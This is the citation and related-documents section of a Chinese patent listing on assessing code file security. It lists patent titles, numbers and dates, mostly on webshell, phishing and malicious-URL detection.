CN114422148A (en) * 2022-03-25 2022-04-29 北京长亭未来科技有限公司 Webshell framework depicting and detecting method, device and equipment

Citations (3)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN101436128A (en) * 2007-11-16 2009-05-20 北京邮电大学 Software test case automatic generating method and system
CN102955914A (en) * 2011-08-19 2013-03-06 百度在线网络技术(北京)有限公司 Method and device for detecting security flaws of source files
CN105069355A (en) * 2015-08-26 2015-11-18 厦门市美亚柏科信息股份有限公司 Static detection method and apparatus for webshell deformation

Non-Patent Citations (1)

* Cited by examiner, † Cited by third party
Title
TRUONG DINH TU et al.: 《Evil-hunter:a novel web shell detection system based on scoring scheme》, 《JOURNAL OF SOUTHEAST UNIVERSITY (ENGLISH EDITION)》 *

Cited By (19)

* Cited by examiner, † Cited by third party
Publication number Priority date Publication date Assignee Title
CN108459962A (en) * 2018-01-23 2018-08-28 平安普惠企业管理有限公司 Code specification detection method, device, terminal device and storage medium
CN108459962B (en) * 2018-01-23 2021-09-03 平安普惠企业管理有限公司 Code normalization detection method and device, terminal equipment and storage medium
CN108959071A (en) * 2018-06-14 2018-12-07 湖南鼎源蓝剑信息科技有限公司 A kind of detection method and system of the PHP deformation webshell based on RASP
CN109408113A (en) * 2018-09-03 2019-03-01 平安普惠企业管理有限公司 A kind of code text processing method, system and terminal device
CN109660499A (en) * 2018-09-13 2019-04-19 阿里巴巴集团控股有限公司 It attacks hold-up interception method and device, calculate equipment and storage medium
CN109660499B (en) * 2018-09-13 2021-07-27 创新先进技术有限公司 Attack interception method and device, computing equipment and storage medium
CN110413284A (en) * 2019-08-06 2019-11-05 腾讯科技(深圳)有限公司 Morphology analysis methods, device, computer equipment and storage medium
CN110413284B (en) * 2019-08-06 2023-10-17 腾讯科技(深圳)有限公司 Lexical analysis method, lexical analysis device, computer equipment and storage medium
CN110795731A (en) * 2019-10-09 2020-02-14 新华三信息安全技术有限公司 Page detection method and device
CN110795731B (en) * 2019-10-09 2022-02-25 新华三信息安全技术有限公司 Page detection method and device
CN111368304A (en) * 2020-03-31 2020-07-03 绿盟科技集团股份有限公司 Malicious sample category detection method, device and equipment
CN111368304B (en) * 2020-03-31 2022-07-05 绿盟科技集团股份有限公司 Malicious sample category detection method, device and equipment
CN114006706A (en) * 2020-07-13 2022-02-01 深信服科技股份有限公司 Network security detection method, system, computer device and readable storage medium
CN113032779A (en) * 2021-02-04 2021-06-25 中国科学院软件研究所 Multi-behavior joint matching method and device based on behavior parameter Boolean expression rule
CN113032779B (en) * 2021-02-04 2024-01-02 中国科学院软件研究所 Multi-behavior joint matching method and device based on behavior parameter Boolean expression rule
CN112800427B (en) * 2021-04-08 2021-09-28 北京邮电大学 Webshell detection method and device, electronic equipment and storage medium
CN112800427A (en) * 2021-04-08 2021-05-14 北京邮电大学 Webshell detection method and device, electronic equipment and storage medium
CN114422148A (en) * 2022-03-25 2022-04-29 北京长亭未来科技有限公司 Webshell framework depicting and detecting method, device and equipment
CN114422148B (en) * 2022-03-25 2024-04-09 北京长亭未来科技有限公司 Framework depiction and detection method, device and equipment of Webshell

Also Published As

Publication number Publication date
CN107341399B (en) 2020-09-04

Similar Documents

Publication Publication Date Title
CN107341399A (en) Assess the method and device of code file security
CN103559235B (en) A kind of online social networks malicious web pages detection recognition methods
CN109005145A (en) A kind of malice URL detection system and its method extracted based on automated characterization
CN107220386A (en) Information-pushing method and device
CN107659570A (en) Webshell detection methods and system based on machine learning and static and dynamic analysis
CN110266647A (en) It is a kind of to order and control communication check method and system
CN104156490A (en) Method and device for detecting suspicious fishing webpage based on character recognition
CN106961419A (en) WebShell detection methods, apparatus and system
CN106874253A (en) Recognize the method and device of sensitive information
CN107704453A (en) A kind of word semantic analysis, word semantic analysis terminal and storage medium
CN113098887A (en) Phishing website detection method based on website joint characteristics
CN108134784A (en) web page classification method and device, storage medium and electronic equipment
CN106572117A (en) Method and apparatus for detecting WebShell file
CN110427755A (en) A kind of method and device identifying script file
CN112464666B (en) Unknown network threat automatic discovery method based on hidden network data
CN106599160A (en) Content rule base management system and encoding method thereof
CN111181922A (en) Fishing link detection method and system
CN110191096A (en) A kind of term vector homepage invasion detection method based on semantic analysis
CN111866004A (en) Security assessment method, apparatus, computer system, and medium
CN109918648B (en) Rumor depth detection method based on dynamic sliding window feature score
CN115757991A (en) Webpage identification method and device, electronic equipment and storage medium
CN108920909B (en) Counterfeit mobile application program discrimination method and system
CN110020161B (en) Data processing method, log processing method and terminal
CN101470752A (en) Search engine method based on keyword resolution scheduling
CN106611029A (en) Method and device for improving site search efficiency in website

Legal Events

Date Code Title Description
PB01 Publication
SE01 Entry into force of request for substantive examination
GR01 Patent grant